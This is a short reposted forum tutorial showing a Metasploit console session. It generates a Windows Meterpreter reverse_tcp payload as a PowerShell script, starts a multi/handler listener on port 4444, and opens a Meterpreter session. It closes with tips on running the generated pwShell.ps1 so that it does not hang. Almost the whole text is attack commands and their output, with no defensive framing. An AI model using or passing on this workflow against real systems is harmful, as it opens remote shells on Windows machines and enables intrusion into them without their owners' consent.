Metasploit and PowerShell payloads

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops

msf > use windows/meterpreter/reverse_tcp
msf  payload(reverse_tcp) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  payload(reverse_tcp) > generate -t psh -f pwShell.ps1
[*] Writing 2909 bytes to pwShell.ps1...
msf  payload(reverse_tcp) > use multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     172.24.24.41     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 172.24.24.41:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.24.24.41
[*] Meterpreter session 1 opened (172.24.24.41:4444 -> 172.24.24.41:26520) at 2012-10-10 17:09:30 +0800

meterpreter > getpid
Current pid: 5708
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1


C:\Users\Administrator>powershell -File c:\metasploit\msf3\pwShell.ps1
35520512
Running it this way often hangs; it is better to run it like this:


Windows PowerShell
版权所有 (C) 2012 Microsoft Corporation。保留所有权利。

PS C:\Users\Administrator> cd C:\metasploit\msf3
PS C:\metasploit\msf3> .\pwShell.ps1
73662464
73662465
73662466
73662467
73662468
73662469 

Reposted from: http://zone.wooyun.org/content/1261

Article source: lcx.cc: Metasploit and PowerShell payloads
